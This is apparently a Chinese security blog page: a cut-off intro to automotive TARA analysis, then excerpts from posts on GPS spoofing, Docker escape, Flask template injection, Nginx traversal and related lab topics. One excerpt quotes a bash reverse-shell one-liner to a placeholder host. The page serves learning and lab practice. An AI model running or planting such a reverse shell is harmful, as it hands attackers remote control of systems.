什么是TARA分析?
TARA分析,即Threat Analysis and Risk Assessment(威胁分析与风险评估),是汽车电子电气架构中一种重要的网络安全方法论。它严格遵循“ISO/SAE 21434 道路车辆-网络安全工程标准”,该标准是汽车电子电气和网络安全的权威行业规范,其中第15章节专门阐述了TA
最新文章
Windows下使用GNU Radio和gps-sdr-sim
做GPS欺骗实验前需要准备点东西,一个是GNU Radio,相当于是hackrf的运行库,它提供了hackrf_info、hackrf_transfer这些命令;第二个是gps-sdr-sim这个开源项目,使用广播星历文件生成伪造GPS的信号文件,hackrf只负责发送信号不负责伪造,所以伪造的工作
容器安全之Docker逃逸
一、危险配置 1. Privileged特权模式 利用条件:容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘,然后将根目录切换过去。 2. SYS_ADMIN 利用条件: 以root身份运行容器。 使用
对反弹shell中0>&1的理解
今天在学习反弹shell,遇到一个经典的构造: /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解,为什么标准输入重定向到标准输出,攻击端输入的指定就到本机来了呢?标准输入指的是本机键盘输入吗?键盘输入重定向到屏幕不应该就是默认的吗?这
Wireshark分析RDP服务器专有证书
本文记录一次使用Wireshark分析RDP证书的过程,这次遇到的证书比较特殊,是服务器专有证书(Server Proprietary Certificate),不能直接使用X.509格式的方式查看,当时为了分析这个证书花了不少时间。 下面记录一下分析过程,不想看过程可以直接跳到第三章节看快速判断方
session原理和模板注入漏洞
通过在任意文件读取的靶场进行实验,研究Flask框架的session原理和Flask模板注入漏洞原理。靶场的搭建信息如下: docker-compose.yml version: '3.2'
services:
web:
image: registry.cn-hangzhou.aliyu
Docker容器识别
想研究的课题是容器的渗透,一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器,通过何种手段开源判断此环境是否在容器之中。 容器虚拟技术有很多,最主流的就是Docker,也比较方便搭建实验环境。所以就先研究Docker的容器特征。手边刚好有
Nginx目录穿越漏洞
漏洞介绍 Nginx在配置alias的时候,如果location最后不是以斜杠结尾,而alias以斜杠结尾,那么将出现目录穿越漏洞。 通过实验了解漏洞 实验靶场用的是《从0到1:CTFer成长之路》第一章第三节任意文件读取漏洞的第2个实验靶场。 靶场的配置文件docker-compose.yml内容
宝塔PHP安装扩展memcached失败
使用宝塔自带的php扩展安装功能,安装memcached失败,截取报错信息最后一段: checking whether to enable memcached msgpack serializer support... no
checking whether to enable memcached